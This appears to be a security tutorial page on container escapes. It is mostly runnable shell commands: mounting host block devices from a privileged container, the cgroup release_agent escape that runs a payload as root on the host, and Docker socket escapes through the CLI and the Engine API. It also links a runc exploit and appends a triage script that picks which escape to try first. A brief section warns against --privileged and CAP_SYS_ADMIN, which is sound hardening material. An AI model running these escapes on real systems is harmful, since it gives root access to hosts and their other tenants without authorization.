Container Escapes
Exploitation
Container escape techniques let an attacker break out of container isolation and reach the underlying host. The vectors seen most often in practice are privileged containers (or containers granted dangerous capabilities such as CAP_SYS_ADMIN), a Docker socket mounted into the container, and vulnerabilities in the kernel or the container runtime itself.
Privileged Container Escape
```bash
# Check whether the container is privileged. --privileged grants every
# capability, so CapEff is all ones (0000003fffffffff on kernels with 38
# capabilities, 000001ffffffffff with 41); a default Docker container shows
# 00000000a80425fb. capsh, if installed, decodes the mask (look for cap_sys_admin).
grep CapEff /proc/1/status
capsh --decode=$(awk '/CapEff/ {print $2}' /proc/1/status)
# If running with --privileged, host block devices are visible, so the host root
# filesystem can be mounted directly. Identify the device first (lsblk / fdisk -l).
lsblk
mkdir /host
mount /dev/sda1 /host    # substitute the host root device found above
# Chroot into host
chroot /host /bin/bash
# Alternative: cgroup v1 release_agent escape (needs CAP_SYS_ADMIN, a kernel that
# still offers cgroup v1, and an overlayfs-backed container). The kernel runs
# release_agent on the host, as root, when the last process leaves a cgroup that
# has notify_on_release set.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
# Host-side path of this container's overlay upper layer, so files created here
# can be addressed from the host
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write the payload the host will run; send its output back into the container
cat > /cmd <<EOF
#!/bin/sh
ps aux > $host_path/output
EOF
chmod a+x /cmd
# Trigger execution on the host: a short-lived sh joins cgroup x and exits, which
# empties the cgroup. \$\$ is escaped so the inner shell's PID is written.
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
sleep 1; cat /output
# Docker socket escape
# If /var/run/docker.sock is mounted in the container, write access to it is root
# on the host, because the daemon runs as root
docker -H unix:///var/run/docker.sock run --rm -it -v /:/host alpine chroot /host
# Or use the Docker Engine API directly (no docker CLI needed): create a container
# with the host root bind-mounted, then start it. Cmd must not need a TTY.
curl --unix-socket /var/run/docker.sock -X POST -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["chroot","/host","sh","-c","id > /tmp/escaped"],"HostConfig":{"Binds":["/:/host"]}}' \
  http://localhost/containers/create
# ID is the Id field returned by the create call
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/ID/start
# Kernel or runtime vulnerabilities (CVE-2019-5736 is a runc bug, not a kernel one)
# A malicious container overwrites the host runc binary via /proc/self/exe when an
# operator runs docker exec into it (or when a malicious image is started); every
# container launched afterwards then runs attacker code as root on the host
# https://github.com/Frichetten/CVE-2019-5736-PoC
```
Never Run Containers as --privileged
The --privileged flag disables most of the isolation Docker normally applies: the container receives every capability, the default seccomp and AppArmor profiles are dropped, and all host devices are exposed, which is exactly what the mount and release_agent escapes above rely on. It should almost never be used in production.
If elevated permissions are needed, grant only the specific capabilities the workload requires with --cap-add (for example CAP_NET_ADMIN for network tooling) instead. Treat CAP_SYS_ADMIN as equivalent to --privileged: on its own it is enough to mount filesystems and to perform the cgroup escape, so a request for it deserves the same scrutiny.
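The checks above (CapEff decoding, Docker socket, overlay upperdir, cgroup v1 availability) combined into one triage script that can be run inside a suspect container, as an added example that is not part of the original page. Every check takes its input as an argument so it can be exercised on constructed data; the block at the bottom feeds it the live /proc and filesystem. The function names, the "verdict" labels and the sample mask values are this example's own choices; the capability bit numbers are those of linux/capability.h.

```shell
#!/bin/sh
# Added example, not from the original page: pre-escape triage from inside a
# container. Functions take text or hex masks as arguments so they can be run
# against constructed input; the live run at the bottom uses /proc directly.

# Capability bit numbers from linux/capability.h
CAP_NET_ADMIN=12
CAP_SYS_ADMIN=21

# has_cap HEXMASK BIT: prints 1 if capability BIT is set in HEXMASK, else 0
has_cap() {
    printf '%s\n' "$(( (0x$1 >> $2) & 1 ))"
}

# capeff_from_status STATUS_TEXT: the hex CapEff value from /proc/PID/status
capeff_from_status() {
    printf '%s\n' "$1" | sed -n 's/^CapEff:[[:space:]]*//p'
}

# is_full_mask HEXMASK: 1 when the mask covers at least the 38 classic
# capabilities with no gaps (0x3fffffffff, 0x1ffffffffff, ...), which is what
# --privileged produces; 0 for a default or --cap-add'ed set
is_full_mask() {
    v=$(( 0x$1 ))
    printf '%s\n' "$(( v >= 0x3fffffffff && (v & (v + 1)) == 0 ))"
}

# upperdir_from_mounts MOUNTS_TEXT: host-side path of the container's overlay
# upper layer, taken from the root mount line; empty if root is not overlayfs
upperdir_from_mounts() {
    printf '%s\n' "$1" | sed -n 's|^overlay / .*upperdir=\([^,]*\).*|\1|p'
}

# cgroup_v1_supported FILESYSTEMS_TEXT: 1 if /proc/filesystems lists "cgroup"
# (v1 hierarchies, which release_agent needs); 0 on a cgroup2-only kernel
cgroup_v1_supported() {
    if printf '%s\n' "$1" | grep -q '[[:space:]]cgroup$'; then echo 1; else echo 0; fi
}

# classify CAPEFF_HEX SOCKET_PRESENT UPPERDIR CGROUPV1: the most direct escape
# path the findings suggest, or "none"
classify() {
    if [ "$2" = 1 ]; then echo docker-socket; return; fi
    if [ "$(is_full_mask "$1")" = 1 ]; then echo privileged-mount; return; fi
    if [ "$(has_cap "$1" "$CAP_SYS_ADMIN")" = 1 ] && [ -n "$3" ] && [ "$4" = 1 ]; then
        echo cgroup-release-agent; return
    fi
    echo none
}

# Live run against this container (skipped where /proc/1/status is unreadable)
if [ -r /proc/1/status ]; then
    capeff=$(capeff_from_status "$(cat /proc/1/status)")
    capeff=${capeff:-0}
    if [ -S /var/run/docker.sock ]; then sock=1; else sock=0; fi
    upper=$(upperdir_from_mounts "$(cat /proc/mounts)")
    v1=$(cgroup_v1_supported "$(cat /proc/filesystems)")
    echo "CapEff=$capeff sys_admin=$(has_cap "$capeff" "$CAP_SYS_ADMIN") net_admin=$(has_cap "$capeff" "$CAP_NET_ADMIN")"
    echo "docker.sock=$sock upperdir=${upper:-none} cgroup_v1=$v1"
    echo "verdict: $(classify "$capeff" "$sock" "$upper" "$v1")"
fi
```

The verdict is only a pointer to which technique to try first: a container with CAP_SYS_ADMIN but no overlayfs root, or on a cgroup2-only kernel, still has mount and device access worth examining by hand, and a Docker socket always wins because it needs no capabilities at all inside the container.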